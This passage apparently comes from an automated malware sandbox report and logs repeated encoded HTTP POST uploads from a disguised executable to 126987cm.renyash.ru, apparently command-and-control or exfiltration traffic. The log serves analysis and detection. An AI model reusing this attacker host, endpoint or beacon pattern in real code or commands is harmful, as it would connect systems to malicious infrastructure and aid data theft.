                                                                                                                                Jan 1, 2025 21:48:18.993268013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:19.248621941 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55970%2BX3%2BlDkw1PEtf26CokQafwQ9lWwZW4Mp4GeWFqNW3zhqMMdMx9vng%2FhQTJakblCT6WldUdwb0AzTqruhHeQy4QCe%2B7O0zASJqQzObMkjIsRtiEquxhAA%2F27s5zm5C9BrqHd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e966e5d42d4-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2208&min_rtt=1592&rtt_var=1830&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=223720&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                71 | 192.168.2.4 | 49970 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:19.377564907 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                72 | 192.168.2.4 | 49973 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:19.599226952 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:19.952332020 CET | 1764 | OUT | Data Raw: 54 55 5b 50 56 41 5c 54 5d 56 5b 57 54 5b 51 53 58 57 58 5c 5b 5f 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[PVA\T]V[WT[QSXWX\[_WCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["02'Y 2.!43,X6<<"<006]>@&+-+&:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:20.071722031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:20.264096975 CET | 966 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhgoZjCogAd0SEG%2B92OW7i3GuOtLBlX%2BKnpPLxfmoKlW9hbKTDi6h7kNf59Do3tJT%2FUe0eAaHL%2F9WnVjZXyl%2F%2B4yLPImv%2BrC%2B7mwyI4HRVFoOrCVvPanoTfexCWNbgk71M82ItVp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e9d1b3d9e16-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3131&min_rtt=1861&rtt_var=3238&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=121433&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 54 28 36 0d 54 34 22 21 56 28 2b 2b 5e 31 22 3a 59 26 0d 29 41 3c 3b 2f 5e 28 59 3b 0b 24 2c 30 5d 26 2a 22 0a 2b 32 02 10 2a 1c 20 5c 05 1b 39 5b 24 39 33 58 32 05 0b 10 2a 33 23 00 20 06 22 59 3e 0d 3b 09 20 3b 21 10 31 2b 39 56 24 14 2d 0d 3c 02 2b 1a 29 33 2c 0d 26 07 2a 51 0f 16 38 53 29 33 2d 03 2a 12 30 5a 27 31 38 5b 35 1b 2d 1e 31 2b 0d 53 27 29 2a 1f 28 10 2b 56 36 33 3f 52 25 2f 31 02 26 2e 3c 09 2e 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!T(6T4"!V(++^1":Y&)A<;/^(Y;$,0]&*"+2* \9[$93X2*3# "Y>; ;!1+9V$-<+)3,&*Q8S)3-*0Z'18[5-1+S')*(+V63?R%/1&.<.*&^ "S?UV0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                73 | 192.168.2.4 | 49974 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:19.719274044 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:20.077482939 CET | 1072 | OUT | Data Raw: 54 57 5b 5f 53 47 5c 52 5d 56 5b 57 54 54 51 58 58 5c 58 5c 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[_SG\R]V[WTTQXX\X\[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0?""9"'\$4["7*$<6%8S'36Z*>?^'*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:20.171821117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:20.343327045 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFQvClkhjgj81DxOAFeufRljF2owYgH7ePcGJJNq2K1erAW7g9zZCdhpqn6Wu%2FCPBJuGB6LREZrEsgEkB3bKbNvuf51b0vmTYax5rCjzgTGC6SZgc1z675ooqFO769TnrskSJw%2Bp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e9dcc014384-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3557&min_rtt=1615&rtt_var=4490&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=85106&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                74 | 192.168.2.4 | 49980 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:20.474062920 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:20.861793995 CET | 1072 | OUT | Data Raw: 51 51 5b 5f 56 45 5c 53 5d 56 5b 57 54 5e 51 5e 58 56 58 5e 5b 54 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ[_VE\S]V[WT^Q^XVX^[TWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["0$""5;'=8Z"+$<$!&4W'=6*+. &!^&%X*/
                                                                                                                                Jan 1, 2025 21:48:20.939517021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:21.203891993 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVoPqicxyU%2FYfHmr6nF11x%2FTdV7WK6KTxvfumX%2Ffz1V1wTT2nEOq1lk8LWmK3OYE%2FRg4VQ1Y25VLHJcyWFQHpxr2wMGGoo2lME6If3Q%2FLuTNMZa1%2BscNAlvIo16as7dTgjgcl5zz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ea28e82425b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3501&min_rtt=1559&rtt_var=4469&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=85400&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                75 | 192.168.2.4 | 49986 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:21.330883026 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:21.686697960 CET | 1072 | OUT | Data Raw: 54 5e 5b 50 53 46 59 57 5d 56 5b 57 54 54 51 5f 58 52 58 50 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[PSFYW]V[WTTQ_XRXP[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$[49\!>,%=Y5;$(+Q#%+' 2>*+=<X&*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:21.775507927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:22.041657925 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aaR56CGkgv6Fv4V62aLWZOOXesgANtMVX9g%2F%2F2pVacphgzvtEKNAVZt8IhK98sAwoir0%2FqFLkmpEY9a%2FyC02hQu62YDNiXiKplOvDA5AY09aY69v07gOx2yU%2FDCg61mclKfLEf0B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ea7cc18429e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2427&min_rtt=2055&rtt_var=1516&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=289855&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                76 | 192.168.2.4 | 49992 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:22.171600103 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:22.530476093 CET | 1072 | OUT | Data Raw: 51 52 5e 50 56 47 5c 55 5d 56 5b 57 54 5b 51 5d 58 57 58 5b 5b 55 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^PVG\U]V[WT[Q]XWX[[UWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0?42"5;]0=45#(B+Q!%8R0 2=%*>=8^1!^&%X*
Jan 1, 2025 21:48:22.615510941 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:22.795046091 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pyTQr7Zw5AStA%2FN6foJ6JuykgFUxCOX3opTk1uQrtAXqmPMDMQjh1A7QtB%2Fp1h%2FEzav2w70iIkjCZDuOUP5uwEKednTT6%2BhIaVx%2FUlTahwfZ2KCJBgKxFSluJE04RQSlXUDUT4RW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ead09dc183d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=1609&rtt_var=2305&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=173437&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49998 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:22.921646118 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:23.280643940 CET | 1072 | OUT | Data Raw: 54 52 5e 50 53 43 59 5e 5d 56 5b 57 54 59 51 5d 58 51 58 5d 5b 5e 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR^PSCY^]V[WTYQ]XQX][^WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'1?[71.!?\3>'5;?S?47V"8W3V-)6(<_&!^&%X*3
Jan 1, 2025 21:48:23.387042046 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:23.647599936 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLi%2BEc9xonlodfmxde6ays84nshC3vi8F0gC9kkBkbOCEiIi%2F56j6vpO78CISm5XpP%2FUqKBu%2B1OHGh0qhTAnmhyjWg6ATF8YcyU3X5CblVsTCtbTfECwqscSr4UZq3GDCfhjmhgB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eb1db866a4e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4850&min_rtt=2156&rtt_var=6197&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=61572&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 50004 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:23.910115004 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:24.264970064 CET | 1072 | OUT | Data Raw: 51 56 5e 52 56 4a 59 54 5d 56 5b 57 54 54 51 52 58 5d 58 51 5b 57 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^RVJYT]V[WTTQRX]XQ[WWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!['3^7215>$08^";'R?485$T$0[(&@<+2*!^&%X*
Jan 1, 2025 21:48:24.364288092 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:24.654026031 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:24 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpvvFQbgoTL6VC16csXQgCMI6MSLBWyy3%2BpbOGALlM%2FVrid8HGY56w4O2ykpWIwJ1eDixL9N3MbJF5gG9uqpcGXo4AJ23SxQS61wQ6sDxr4JzV%2BEadCoNmXSVvePCT%2FU%2FDsvFgNh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eb7fff4437a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2971&min_rtt=1584&rtt_var=3368&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=115114&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50015 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:24.783849001 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:25.139825106 CET | 1064 | OUT | Data Raw: 51 56 5b 50 53 43 59 5e 5d 56 5b 57 54 5c 51 5e 58 56 58 5a 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[PSCY^]V[WT\Q^XVXZ[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z'T 7!8%>$";<<+V6%(30**(=#&!^&%X*3
Jan 1, 2025 21:48:25.255770922 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50016 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:25.273418903 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
